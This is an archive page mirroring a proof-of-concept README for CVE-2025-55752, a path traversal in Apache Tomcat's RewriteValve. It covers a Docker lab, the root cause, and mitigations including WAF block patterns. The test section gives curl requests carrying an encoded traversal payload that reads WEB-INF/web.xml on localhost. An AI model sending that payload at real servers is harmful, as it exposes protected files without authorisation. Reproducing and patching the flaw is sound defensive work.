Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-55752 PoC — Apache Tomcat: Directory traversal via rewrite with possible RCE if PUT is enabled

Source
https://github.com/masahiro331/CVE-2025-55752
Associated Vulnerability
Title:Apache Tomcat: Directory traversal via rewrite with possible RCE if PUT is enabled (CVE-2025-55752)
Description:Relative Path Traversal vulnerability in Apache Tomcat. The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.
Readme
# CVE-2025-55752: Apache Tomcat Path Traversal Vulnerability

Docker-based reproduction environment for CVE-2025-55752, a path traversal vulnerability in Apache Tomcat 10.1.44.

## Overview

CVE-2025-55752 is a path traversal vulnerability in Apache Tomcat's RewriteValve caused by incorrect processing
rder: **URL normalization occurs before URL decoding**. This allows attackers to bypass security constraints
rotecting directories like `/WEB-INF/` using URL-encoded path traversal sequences (`..%2f`).

### Vulnerability Characteristics

- **CVE ID**: CVE-2025-55752
- **CVSS v3.1**: 7.5 (HIGH)
- **CWE**: CWE-22 (Path Traversal)
- **Component**: Apache Tomcat RewriteValve
- **Root Cause**: Normalize-before-decode processing order

## Affected Versions

| Series | Vulnerable Versions | Patched Version |
|--------|-------------------|-----------------|
| 11.x | 11.0.0-M1 to 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 to 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 to 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 to 8.5.100 | EOL - No patch |

## Quick Start

```bash
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
```

## Vulnerability Testing

### Test 1: Direct WEB-INF Access (Protected)

```bash
curl -I 'http://localhost:8080/WEB-INF/web.xml'
```

**Expected**: `403 Forbidden`

### Test 2: Information Disclosure (Read Protected Files)

```bash
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
```

**Expected**: `200 OK` + web.xml content (vulnerability confirmed)


## How It Works

1. Request: `/download?path=..%2fWEB-INF%2fweb.xml`
2. RewriteValve rewrites to: `/files/..%2fWEB-INF%2fweb.xml`
3. **URL normalization** (before decode): `%2f` not recognized as `/`, `..` survives
4. **URL decoding**: `%2f` → `/` → `/files/../WEB-INF/web.xml`
5. Path resolution: `/WEB-INF/web.xml`

## Processing Order Issue

```
Correct:    Decode → Normalize → Security Check
Vulnerable: Normalize → Decode → Security Check ✗
```

## Tomcat Fix

- **GitHub**: [apache/tomcat commit 130d36d8](https://github.com/apache/tomcat/commit/130d36d8)
- **Fix**: Decode before normalize

## Mitigation

1. Disable RewriteValve if not required
2. Disable PUT method
3. WAF rules to block `../` and `%2e%2e`
4. Upgrade to patched versions (10.1.45+, 9.0.109+, 11.0.11+)

## References

- [Apache Tomcat Security](https://tomcat.apache.org/security.html)
- [NVD - CVE-2025-55752](https://nvd.nist.gov/vuln/detail/CVE-2025-55752)
- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [CWE-22: Improper Limitation of a Pathname](https://cwe.mitre.org/data/definitions/22.html)

## Disclaimer

⚠️ **WARNING**: Do NOT deploy to production. Use only in isolated test environments.
File Snapshot

 [4.0K]  /data/pocs/891dee605d87c9a4b227e689fd9083d1f5b24c8b
├── [4.0K]  docker
│   ├── [ 397]  Dockerfile
│   ├── [4.0K]  scripts
│   │   ├── [8.3K]  exploit.py
│   │   └── [4.1K]  test_vulnerability.sh
│   └── [4.0K]  tomcat
│       ├── [4.0K]  conf
│       │   ├── [ 210]  context.xml
│       │   ├── [ 115]  rewrite.config
│       │   └── [1.8K]  server.xml
│       └── [4.0K]  webapps
│           └── [4.0K]  ROOT
│               ├── [4.0K]  files
│               │   └── [1.8K]  web.xml
│               ├── [3.8K]  handler.jsp
│               ├── [3.6K]  index.jsp
│               └── [4.0K]  WEB-INF
│                   └── [1.4K]  web.xml
├── [ 391]  docker-compose.yml
└── [2.8K]  README.md

9 directories, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →